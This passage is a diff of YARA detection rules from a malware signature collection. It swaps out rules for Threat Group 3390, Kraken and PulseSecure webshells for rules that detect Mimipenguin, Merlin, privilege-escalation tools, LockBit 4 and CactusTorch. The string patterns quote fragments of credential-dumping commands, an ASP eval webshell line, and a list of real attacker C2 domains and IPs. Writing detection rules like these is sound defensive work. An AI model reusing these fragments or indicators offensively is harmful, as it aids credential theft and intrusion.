-		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		description = "Detects Mimipenguin hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd559642-a102-5946-8a7f-16c10e7f746d"
-		date = "2015-08-06"
+		id = "62754337-52ef-5d3f-af2f-52f820ba0476"
+		date = "2017-07-08"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L156-L183"
+		reference = "https://github.com/huntergregal/mimipenguin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimipenguin.yar#L34-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf274053fe7729471716a710e3bd5ed027d6ab2c45f7af9a1103bfa1ada9cbf4"
-		score = 70
+		logic_hash = "60a7b64eee9e2adfbc65fb5762f18e2abc4a35f9368ad704754870b5e8311391"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
-		hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166"
+		hash1 = "9e8d13fe27c93c7571075abf84a839fd1d31d8f2e3e48b3f4c6c13f7afcf8cbd"
 
 	strings:
-		$s1 = "navlu.dll.urlUT" fullword ascii
-		$s2 = "VPDN_LU.exeUT" fullword ascii
-		$s3 = "pnipcn.dllUT" fullword ascii
-		$s4 = "\\ssonsvr.exe" ascii
-		$s5 = "/c del /q %s" fullword ascii
-		$s6 = "\\setup.exe" ascii
-		$s7 = "msi.dllUT" fullword ascii
-		$op0 = { 8b 45 0c 83 38 00 0f 84 98 }
-		$op1 = { e8 dd 07 00 00 ff 35 d8 fb 40 00 8b 35 7c a0 40 }
-		$op2 = { 83 fb 08 75 2c 8b 0d f8 af 40 00 89 4d dc 8b 0d }
-		$op3 = { c7 43 18 8c 69 40 00 e9 da 01 00 00 83 7d f0 00 }
-		$op4 = { 6a 01 e9 7c f8 ff ff bf 1a 40 00 96 1b 40 00 01 }
+		$x1 = "self._strings_dump += strings(dump_process(target_pid))" fullword ascii
+		$x2 = "def _dump_target_processes(self):" fullword ascii
+		$x3 = "self._target_processes = ['sshd:']" fullword ascii
+		$x4 = "GnomeKeyringPasswordFinder()" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of ( $s* ) and 1 of ( $op* )
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Threatgroup3390_Strings : FILE
+rule SIGNATURE_BASE_Mimipenguin_2 : FILE
 {
 	meta:
-		description = "Threat Group 3390 APT - Strings"
+		description = "Detects Mimipenguin hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a44393b-5220-5376-ba18-2330f4623cd6"
-		date = "2015-08-06"
+		id = "b3bb1ba9-cbfc-53fd-81d0-256466ace4de"
+		date = "2017-07-08"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L185-L202"
+		reference = "https://github.com/huntergregal/mimipenguin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimipenguin.yar#L52-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d1e4889a48f4f9bfcc12237dd44cd8ad9db9918c6a5859de086d1ddc051ff937"
-		score = 60
+		logic_hash = "53a1f47ef9c94ef6bffbc9d7b9f3a8e0a7fb132c0936ea27e6be775cf99792a0"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "453bffa90d99a820e4235de95ec3f7cc750539e4023f98ffc8858f9b3c15d89a"
 
 	strings:
-		$s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii
-		$s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014"
-		$s3 = "ren *.rar *.zip" fullword ascii
-		$s4 = "c:\\temp\\ipcan.exe" fullword ascii
-		$s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii
+		$x1 = "DUMP=$(strings \"/tmp/dump.${pid}\" | grep -E" fullword ascii
+		$x2 = "strings /tmp/apache* | grep -E '^Authorization: Basic.+=$'" fullword ascii
+		$x3 = "grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A" fullword ascii
+		$x4 = "strings \"/tmp/dump.${pid}\" | grep -E -m 1 '^\\$.\\$.+\\$')\"" fullword ascii
+		$x5 = "if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then" fullword ascii
 
 	condition:
-		1 of them and filesize < 30KB
+		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Threatgroup3390_C2 : FILE
+rule SIGNATURE_BASE_Merlinagent
 {
 	meta:
-		description = "Threat Group 3390 APT - C2 Server"
-		author = "Florian Roth (Nextron Systems)"
-		id = "232b5052-e349-55f1-bd7e-1afc5d35abe4"
-		date = "2015-08-06"
+		description = "Detects Merlin agent"
+		author = "Hilko Bengen"
+		id = "92346a3f-dce4-58db-893b-b7797fa20029"
+		date = "2017-12-26"
 		modified = "2023-12-05"
-		reference = "http://snip.ly/giNB"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L204-L323"
+		reference = "https://github.com/Ne0nd0g/merlin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_merlin_agent.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "be411bb8e301eb4ba611bc9d6c8f0e3b8c27b87c2dd3f8405d0eba0296117697"
-		score = 60
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "21743230556cc11a78942de30be476ad8e73731bbda9a4feb83bd8140a703d01"
+		score = 75
+		quality = 85
+		tags = ""
+		filetype = "pe, elf, mach"
 
 	strings:
-		$s1 = "api.apigmail.com"
-		$s2 = "apigmail.com"
-		$s3 = "backup.darkhero.org"
-		$s4 = "bel.updatawindows.com"
-		$s5 = "binary.update-onlines.org"
-		$s6 = "blackcmd.com"
-		$s7 = "castle.blackcmd.com"
-		$s8 = "ctcb.blackcmd.com"
-		$s9 = "darkhero.org"
-		$s10 = "dav.local-test.com"
-		$s11 = "test.local-test.com"
-		$s12 = "dev.local-test.com"
-		$s13 = "ocean.local-test.com"
-		$s14 = "ga.blackcmd.com"
-		$s15 = "helpdesk.blackcmd.com"
-		$s16 = "helpdesk.csc-na.com"
-		$s17 = "helpdesk.hotmail-onlines.com"
-		$s18 = "helpdesk.lnip.org"
-		$s19 = "hotmail-onlines.com"
-		$s20 = "jobs.hotmail-onlines.com"
-		$s21 = "justufogame.com"
-		$s22 = "lnip.org"
-		$s23 = "local-test.com"
-		$s24 = "login.hansoftupdate.com"
-		$s25 = "long.update-onlines.org"
-		$s26 = "longlong.update-onlines.org"
-		$s27 = "longshadow.dyndns.org"
-		$s28 = "longshadow.update-onlines.org"
-		$s29 = "longykcai.update-onlines.org"
-		$s30 = "lostself.update-onlines.org"
-		$s31 = "mac.navydocument.com"
-		$s32 = "mail.csc-na.com"
-		$s33 = "mantech.updatawindows.com"
-		$s34 = "micr0soft.org"
-		$s35 = "microsoft-outlook.org"
-		$s36 = "mtc.navydocument.com"
-		$s37 = "navydocument.com"
-		$s38 = "mtc.update-onlines.org"
-		$s39 = "news.hotmail-onlines.com"
-		$s40 = "oac.3322.org"
-		$s41 = "ocean.apigmail.com"
-		$s42 = "pchomeserver.com"
-		$s43 = "registre.organiccrap.com"
-		$s44 = "security.pomsys.org"
-		$s45 = "services.darkhero.org"
-		$s46 = "sgl.updatawindows.com"
-		$s47 = "shadow.update-onlines.org"
-		$s48 = "sonoco.blackcmd.com"
-		$s49 = "test.logmastre.com"
-		$s50 = "up.gtalklite.com"
-		$s51 = "updatawindows.com"
-		$s52 = "update-onlines.org"
-		$s53 = "update.deepsoftupdate.com"
-		$s54 = "update.hancominc.com"
-		$s55 = "update.micr0soft.org"
-		$s56 = "update.pchomeserver.com"
-		$s57 = "urs.blackcmd.com"
-		$s58 = "wang.darkhero.org"
-		$s59 = "webs.local-test.com"
-		$s60 = "word.apigmail.com"
-		$s61 = "wordpress.blackcmd.com"
-		$s62 = "working.blackcmd.com"
-		$s63 = "working.darkhero.org"
-		$s64 = "working.hotmail-onlines.com"
-		$s65 = "www.trendmicro-update.org"
-		$s66 = "www.update-onlines.org"
-		$s67 = "x.apigmail.com"
-		$s68 = "ykcai.update-onlines.org"
-		$s69 = "ykcailostself.dyndns-free.com"
-		$s70 = "ykcainobody.dyndns.org"
-		$s71 = "zj.blackcmd.com"
-		$s72 = "laxness-lab.com"
-		$s73 = "google-ana1ytics.com"
-		$s74 = "www.google-ana1ytics.com"
-		$s75 = "ftp.google-ana1ytics.com"
-		$s76 = "hotmailcontact.net"
-		$s77 = "208.115.242.36"
-		$s78 = "208.115.242.37"
-		$s79 = "208.115.242.38"
-		$s80 = "66.63.178.142"
-		$s81 = "72.11.148.220"
-		$s82 = "72.11.141.133"
-		$s83 = "74.63.195.236"
-		$s84 = "74.63.195.236"
-		$s85 = "74.63.195.237"
-		$s86 = "74.63.195.238"
-		$s87 = "103.24.0.142"
-		$s88 = "103.24.1.54"
-		$s89 = "106.187.45.162"
-		$s90 = "192.151.236.138"
-		$s91 = "192.161.61.19"
-		$s92 = "192.161.61.20"
-		$s93 = "192.161.61.22"
-		$s94 = "103.24.1.54"
-		$s95 = "67.215.232.179"
-		$s96 = "96.44.177.195"
-		$s97 = "49.143.192.221"
-		$s98 = "67.215.232.181"
-		$s99 = "67.215.232.182"
-		$s100 = "96.44.182.243"
-		$s101 = "96.44.182.245"
-		$s102 = "96.44.182.246"
-		$s103 = "49.143.205.30"
-		$s104 = "working_success@163.com"
-		$s105 = "ykcaihyl@163.com"
-		$s106 = "working_success@163.com"
-		$s107 = "yuming@yinsibaohu.aliyun.com"
+		$x1 = "Command output:\x0d\x0a\x0d\x0a%s"
+		$x2 = "[-]Connecting to web server at %s to update agent configuration information."
+		$x3 = "[-]%d out of %d total failed checkins"
+		$x4 = "[!}Unknown AgentControl message type received %s"
+		$x5 = "[-]Received Agent Kill Message"
+		$x6 = "[-]Received Server OK, doing nothing"
+		$x7 = "[!]There was an error with the HTTP client while performing a POST:"
+		$x8 = "[-]Sleeping for %s at %s"
+		$s1 = "Executing command %s %s %s"
+		$s2 = "[+]Host Information:"
+		$s3 = "\tHostname: %s"
+		$s4 = "\tPlatform: %s"
+		$s5 = "\tUser GUID: %s"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_Kraken_Bot_Sample : FILE
+rule SIGNATURE_BASE_VULN_PUA_GIGABYTE_Driver_Jul22_1 : FILE
 {
 	meta:
-		description = "Kraken Bot Sample - file inf.bin"
-		author = "Florian Roth (Nextron Systems)"
-		id = "508bb581-9dad-5201-af3d-7da17d905dc9"
-		date = "2015-05-07"
+		description = "Detects a vulnerable GIGABYTE driver sometimes used by malicious actors to escalate privileges"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c66b858f-a034-53e1-b0fd-e48693fc6913"
+		date = "2022-07-25"
 		modified = "2023-12-05"
-		reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kraken_bot1.yar#L8-L26"
+		reference = "https://twitter.com/malmoeb/status/1551449425842786306"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_gigabyte_driver.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
-		logic_hash = "2e0f0a981ce3483aad8e48f6a259f9875ea4f8449feb24bafbae07243dd82a16"
-		score = 90
+		logic_hash = "8aeae559b52b8e01ceab8caba24653b949b3bec694a14b36c819b0a7c9f8b7c6"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427"
 
 	strings:
-		$s2 = "%s=?getname" fullword ascii
-		$s4 = "&COMPUTER=^" fullword ascii
-		$s5 = "xJWFwcGRhdGElAA=" fullword ascii
-		$s8 = "JVdJTkRJUi" fullword ascii
-		$s20 = "btcplug" fullword ascii
+		$xc1 = { 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73
+               00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 32
+               00 2E 00 33 00 37 00 39 00 30 00 2E 00 31 00 38
+               00 33 00 30 00 20 00 62 00 75 00 69 00 6C 00 74
+               00 20 00 62 00 79 00 3A 00 20 00 57 00 69 00 6E
+               00 44 00 44 00 4B 00 00 00 00 00 32 00 09 00 01
+               00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C
+               00 4E 00 61 00 6D 00 65 00 00 00 67 00 64 00 72
+               00 76 00 2E 00 73 00 79 00 73 }
+		$x1 = "AEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAuADIALgAzADcAOQAwAC4AMQA4ADMAMAAgAGIAdQBpAGwAdAAgAGIAeQA6ACAAVwBpAG4ARABEAEsAAAAAADIACQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAZwBkAHIAdgAuAHMAeQBz"
+		$x2 = "BGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADUALgAyAC4AMwA3ADkAMAAuADEAOAAzADAAIABiAHUAaQBsAHQAIABiAHkAOgAgAFcAaQBuAEQARABLAAAAAAAyAAkAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAGcAZAByAHYALgBzAHkAc"
+		$x3 = "ARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAA1AC4AMgAuADMANwA5ADAALgAxADgAMwAwACAAYgB1AGkAbAB0ACAAYgB5ADoAIABXAGkAbgBEAEQASwAAAAAAMgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAGQAcgB2AC4AcwB5AH"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 4000KB and 1 of them
 }
-rule SIGNATURE_BASE_FE_Webshell_PL_ATRIUM_1
+rule SIGNATURE_BASE_Win_Privesc_Gp3Finder_V4_0 : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "b2663343-0bae-5215-a443-866ab8626bff"
-		date = "2021-04-16"
+		description = "Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3b310c12-ac69-527b-9503-1486ae5f692c"
+		date = "2016-06-02"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L12-L27"
+		reference = "http://grimhacker.com/2015/04/10/gp3finder-group-policy-preference-password-finder/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_win_privesc.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ca0175d86049fa7c796ea06b413857a3"
-		logic_hash = "869b397616495c644beb997602eac84ddcdbacce4c14755c555f5bda36663ca2"
-		score = 75
+		logic_hash = "7d5618315ae5293ce1aea18d255d08bb007f39a466021fb636605684433da158"
+		score = 80
 		quality = 60
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7d34e214ef2ca33516875fb91a72d5798f89b9ea8964d3990f99863c79530c06"
 
 	strings:
-		$s1 = "CGI::param("
-		$s2 = "system("
-		$s3 = /if[\x09\x20]{0,32}\(CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)\)\s{0,128}\{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\\n\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my \$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)[\x09\x20]{0,32};\s{0,128}system\([\x22\x27]\$/
+		$x1 = "Check for and attempt to decrypt passwords on share" ascii
+		$x2 = "Failed to auto get and decrypt passwords. {0}s/" fullword ascii
+		$x3 = "GPPPFinder - Group Policy Preference Password Finder" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_FE_Trojan_SH_ATRIUM_1
+rule SIGNATURE_BASE_Win_Privesc_Folderperm
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "c49441f4-a138-534c-a858-a7462ed865c9"
-		date = "2021-04-16"
+		description = "Detects a tool that can be used for privilege escalation - file folderperm.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "131fdb57-f9ca-5247-8bb4-c939eff5b8bf"
+		date = "2016-06-02"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L29-L45"
+		reference = "http://www.greyhathacker.net/?p=738"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_win_privesc.yar#L28-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a631b7a8a11e6df3fccb21f4d34dbd8a"
-		logic_hash = "672a293660d89d5d7d62a658c360bad0b6408611d8794744b17a81e6a75ceea7"
-		score = 75
-		quality = 35
+		logic_hash = "899fda75e4c6d9f588767e5170dbd30241a492ba89f7cc1b0ad4adb2fcd173cb"
+		score = 80
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1aa87df34826b1081c40bb4b702750587b32d717ea6df3c29715eb7fc04db755"
 
 	strings:
-		$s1 = "CGI::param("
-		$s2 = "Cache-Control: no-cache"
-		$s3 = "system("
-		$s4 = /sed -i [^\r\n]{1,128}CGI::param\([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param\([^\r\n]{1,128}system\(/
+		$x1 = "# powershell.exe -executionpolicy bypass -file folderperm.ps1" fullword ascii
+		$x2 = "Write-Host \"[i] Dummy test file used to test access was not outputted:\" $filetocopy" fullword ascii
+		$x3 = "Write-Host -foregroundColor Red \"      Access denied :\" $myarray[$i] " fullword ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_FE_APT_Webshell_PL_HARDPULSE
+rule SIGNATURE_BASE_Win_Privesc_Adaclscan4_3
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "f9a2922e-6b8e-5f92-a947-3215ee8883ac"
-		date = "2021-04-16"
+		description = "Detects a tool that can be used for privilege escalation - file ADACLScan4.3.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "15867a9c-9b9b-5d29-bf51-2b3e91af556f"
+		date = "2016-06-02"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L46-L65"
+		reference = "https://adaclscan.codeplex.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_win_privesc.yar#L46-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "980cba9e82faf194edb6f3cc20dc73ff"
-		logic_hash = "37fc40fd998d3294edb05707170bc2deec524fc6451bff212901f9ac3e34bb35"
-		score = 75
-		quality = 58
+		logic_hash = "ca657e5c4172d240f46a890fc112ee89d5bdf9e35e7d412332ee11bdaf166215"
+		score = 60
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3473ddb452de7640fab03cad3e8aaf6a527bdd6a7a311909cfef9de0b4b78333"
 
 	strings:
-		$r1 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}unless[\x09\x20]{0,32}\(open\(\$\w{1,64},[\x09\x20]{0,32}\$\w{1,64}\)\)\s{0,128}\{\s{1,128}goto[\x09\x20]{1,32}\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}return[\x09\x20]{1,32}0[\x09\x20]{0,32}\x3b\s{0,128}\}/
-		$r2 = /open[\x09\x20]{0,32}\(\*\w{1,64}[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>/
-		$r3 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/
-		$s1 = "CGI::request_method()"
-		$s2 = "CGI::param("
-		$s3 = "syswrite("
-		$s4 = "print $_"
+		$s1 = "<Label x:Name=\"lblPort\" Content=\"Port:\"  HorizontalAlignment=\"Left\" Height=\"28\" Margin=\"10,0,0,0\" Width=\"35\"/>" fullword ascii
+		$s2 = "(([System.IconExtractor]::Extract(\"mmcndmgr.dll\", 126, $true)).ToBitMap()).Save($env:temp + \"\\Other.png\")    " fullword ascii
+		$s3 = "$bolValid = $ctx.ValidateCredentials($psCred.UserName,$psCred.GetNetworkCredential().Password)" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_LOCKPICK_1 : FILE
+rule SIGNATURE_BASE_Mal_Lockbit4_Rc4_Win_Feb24 : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "00c09378-25a0-55f1-8d93-7b22d98bd8c2"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L66-L80"
+		description = "Detect the implementation of RC4 Algorithm by Lockbit4.0"
+		author = "0x0d4y"
+		id = "4de48ced-b9fa-4286-aac4-c263ad20d67d"
+		date = "2024-02-13"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit4_rc4_win_feb24.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e8bfd3f5a2806104316902bbe1195ee8"
-		logic_hash = "1623c2dc63fe7d595069a024b715bbca267ec1c9400afcadc377ae58afb81a2a"
-		score = 75
+		hash = "062311f136d83f64497fd81297360cd4"
+		logic_hash = "85e8087f875c45ce39b7014fc0737dc86f1e18d4643fdbb0a80d18feff774680"
+		score = 100
 		quality = 85
 		tags = "FILE"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.lockbit"
 
 	strings:
-		$sb1 = { 83 ?? 63 0F 84 [4] 8B 45 ?? 83 ?? 01 89 ?? 24 89 44 24 04 E8 [4] 85 C0 }
-		$sb2 = { 83 [2] 63 74 ?? 89 ?? 24 04 89 ?? 24 E8 [4] 83 [2] 01 85 C0 0F [5] EB 00 8B ?? 04 83 F8 02 7? ?? 83 E8 01 C1 E0 02 83 C0 00 89 44 24 08 8D 83 [4] 89 44 24 04 8B ?? 89 04 24 E8 }
+		$rc4_alg = { 48 3d 00 01 00 00 74 0c 88 84 04 ?? ?? ?? ?? 48 ff c0 eb ec 29 c9 41 b8 ?? ?? ?? ?? 4c 8d 0d 15 7b 00 00 45 31 d2 48 81 f9 00 01 00 00 74 34 44 8a 9c 0c ?? ?? ?? ?? 45 00 da 89 c8 99 41 f7 f8 46 02 14 0a 41 0f b6 c2 8a 94 04 ?? ?? ?? ?? 88 94 0c ?? ?? ?? ?? 44 88 9c 04 ?? ?? ?? ?? 48 ff c1 eb c3 29 c0 48 8b 0d 14 9e 00 00 31 d2 45 29 c0 48 3d ?? ?? ?? ?? 74 4b 41 ff c0 45 0f b6 c0 46 8a 8c 04 ?? ?? ?? ?? 44 00 ca 44 0f b6 d2 46 8a 9c 14 ?? ?? ?? ?? 46 88 9c 04 ?? ?? ?? ?? 46 88 8c 14 ?? ?? ?? ?? 46 02 8c 04 ?? ?? ?? ?? 45 0f b6 c9 46 8a 8c 0c ?? ?? ?? ?? 44 30 0c 01 48 ff c0 eb ad }
 
 	condition:
-		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] )
+		uint16( 0 ) == 0x5a4d and $rc4_alg
 }
-rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_PACEMAKER : FILE
+rule SIGNATURE_BASE_CACTUSTORCH : FILE
 {
 	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "459e26f1-4ea9-56dd-ad71-0ed2c7499aea"
-		date = "2021-04-16"
+		description = "Detects CactusTorch Hacktool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "75606b9e-97d5-5b8b-87f5-69b7e415b73c"
+		date = "2017-07-31"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L81-L98"
+		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gen_cactustorch.yar#L11-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d7881c4de4d57828f7e1cab15687274b"
-		logic_hash = "f3f89744ce558179f36da3b412ba4afb3798684e6d976ef59de565b5a3323ad6"
+		logic_hash = "265287b27aa13840366dbb51ea58b2fdd10e0a57ff27d8deb52ff77dd71c26ad"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "314e6d7d863878b6dca46af165e7f08fedd42c054d7dc3828dc80b86a3a9b98c"
+		hash2 = "0305aa32d5f8484ca115bb4888880729af7f33ac99594ec1aa3c65644e544aea"
+		hash3 = "a52d802e34ac9d7d3539019d284b04ded3b8e197d5e3b38ed61f523c3d68baa7"
 
 	strings:
-		$s1 = "\x00/proc/%d/mem\x00"
-		$s2 = "\x00/proc/%s/maps\x00"
-		$s3 = "\x00/proc/%s/cmdline\x00"
-		$sb1 = { C7 44 24 08 10 00 00 00 C7 44 24 04 00 00 00 00 8D 45 E0 89 04 24 E8 [4] 8B 45 F4 83 C0 0B C7 44 24 08 10 00 00 00 89 44 24 04 8D 45 E0 89 04 24 E8 [4] 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] EB }
